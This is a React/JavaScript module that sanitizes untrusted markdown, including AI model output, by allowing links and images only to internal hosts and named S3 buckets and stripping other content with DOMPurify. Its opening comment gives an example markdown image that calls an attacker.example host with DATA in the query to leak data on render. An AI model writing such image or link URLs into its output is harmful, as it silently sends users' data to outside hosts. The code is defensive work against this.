/**
 * Safe rendering of untrusted markdown (AI output, uploaded results).
 *
 * An image in markdown is fetched as soon as it renders, so model output such as
 * `![x](https://attacker.example/a.png?q=DATA)` leaks data with no click, and a link
 * can do the same in one click. Images and links are therefore only kept when they
 * point at this site or an Amazon-internal host, and images may also come from Vault's
 * S3 buckets; anything else is shown as plain text.
 *
 * - `withSafeMarkdownUrls(components)` wraps a react-markdown `components` map.
 * - `sanitizeMarkdownHtml(html)` cleans HTML produced from markdown (e.g. by `marked`)
 *   before it is printed or exported.
 */
import React from 'react';
import DOMPurify from 'dompurify';

// Hosts (and their subdomains) that may be linked to or loaded from.
// amazonaws.com is left out on purpose: anyone can create an S3 bucket there.
export const ALLOWED_URL_HOSTS = ['amazon.com', 'amazon.dev', 'a2z.com', 'aws.dev', 'amazon.sharepoint.com'];

const hostAllowed = (host) => ALLOWED_URL_HOSTS.some((allowed) => host === allowed || host.endsWith(`.${allowed}`));

/**
 * True for http(s) URLs on this site or an allowed host, and for relative URLs and
 * in-page anchors (they resolve against this site). Everything else, including
 * javascript:, data: and protocol-relative URLs to other hosts, is false.
 */
export const isAllowedUrl = (url) => {
  if (typeof url !== 'string' || url.trim() === '') return false;
  let parsed;
  try {
    parsed = new URL(url.trim(), window.location.origin);
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return false;
  return parsed.origin === window.location.origin || hostAllowed(parsed.hostname.toLowerCase());
};

// Vault's S3 buckets, beta and prod (AccountingBICentralPythonLambda Vault/Constants.py
// ServiceToBucketMapper). Vault hands out presigned URLs on these buckets, so images
// served through Vault can load; a URL on one of our own buckets can't send data anywhere else.
export const VAULT_BUCKETS = [
  'beta-close-portal', 'beta-frisco', 'beta-logico', 'beta-flexico', 'beta-tanc', 'ui4bi-bucket84824-dev',
  'ateam-analytics-responses-beta', 'accounting-central-analytics-data-beta', 'accounting-central-generic-beta',
  'doceval-documents-beta',
  'prod-close-portal', 'prod-frisco', 'prod-logico', 'prod-flexico', 'prod-tanc', 'ui4bi-prod-bucket164517-dev',
  'ateam-analytics-responses-prod', 'accounting-central-analytics-data-prod', 'accounting-central-generic-prod',
  'doceval-documents-prod',
];

// {bucket}.s3.amazonaws.com or {bucket}.s3.{region}.amazonaws.com (what boto3 presigns), or path style.
const S3_VIRTUAL_HOST = /^([a-z0-9.-]+)\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$/;
const S3_PATH_HOST = /^s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$/;

/** True for https URLs on one of Vault's buckets. */
export const isVaultUrl = (url) => {
  if (typeof url !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(url.trim());
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== 'https:') return false;
  const host = parsed.hostname.toLowerCase();
  const virtual = host.match(S3_VIRTUAL_HOST);
  if (virtual) return VAULT_BUCKETS.includes(virtual[1]);
  if (S3_PATH_HOST.test(host)) return VAULT_BUCKETS.includes(decodeURIComponent(parsed.pathname.split('/')[1] || ''));
  return false;
};

/** Images may also come from Vault. */
export const isAllowedImageUrl = (url) => isAllowedUrl(url) || isVaultUrl(url);

const DefaultLink = ({ node, ...props }) => <a {...props} />;

/**
 * Wraps a react-markdown `components` map so that links to other hosts render as
 * their text only, and images only load from allowed hosts or Vault (otherwise
 * their alt text is shown). The map's own `a` renderer is used for allowed links.
 */
export const withSafeMarkdownUrls = (components = {}) => {
  const BaseLink = components.a || DefaultLink;
  const BaseImage = components.img;

  const SafeLink = ({ node, href, children, ...rest }) => {
    if (!isAllowedUrl(href)) {
      return <span className="safe-md-blocked-link" title="Link removed: not an Amazon-internal address">{children}</span>;
    }
    return <BaseLink node={node} href={href} {...rest}>{children}</BaseLink>;
  };

  const SafeImage = ({ node, src, alt, ...rest }) => {
    if (!isAllowedImageUrl(src)) {
      return alt ? <span className="safe-md-blocked-image" title="Image not loaded: not an Amazon-internal address">[{alt}]</span> : null;
    }
    return BaseImage ? <BaseImage node={node} src={src} alt={alt} {...rest} /> : <img src={src} alt={alt || ''} {...rest} />;
  };

  return { ...components, a: SafeLink, img: SafeImage };
};

/**
 * Removes scripts, event handlers and the like (DOMPurify defaults), SVG, MathML
 * and inline styles, then drops images and unwraps links that point outside the
 * allowed hosts.
 */
export const sanitizeMarkdownHtml = (html) => {
  if (typeof html !== 'string' || html === '') return html;
  const template = document.createElement('template');
  // HTML only: SVG <image>/<use> and MathML can load from any host. style is dropped
  // too: CSS url() would fetch from any host.
  template.innerHTML = DOMPurify.sanitize(html, {
    USE_PROFILES: { html: true },
    FORBID_TAGS: ['style', 'form', 'iframe', 'object', 'embed', 'link', 'meta', 'base'],
    FORBID_ATTR: ['style'],
  });
  const root = template.content;
  root.querySelectorAll('img, source, video, audio, picture').forEach((el) => {
    const src = el.getAttribute('src');
    if (el.hasAttribute('srcset') || !isAllowedImageUrl(src)) {
      const alt = el.getAttribute('alt');
      el.replaceWith(alt ? document.createTextNode(`[${alt}]`) : document.createTextNode(''));
    }
  });
  root.querySelectorAll('a').forEach((el) => {
    if (!isAllowedUrl(el.getAttribute('href'))) el.replaceWith(...el.childNodes);
  });
  root.querySelectorAll('[background], [poster]').forEach((el) => {
    el.removeAttribute('background');
    el.removeAttribute('poster');
  });
  return template.innerHTML;
};
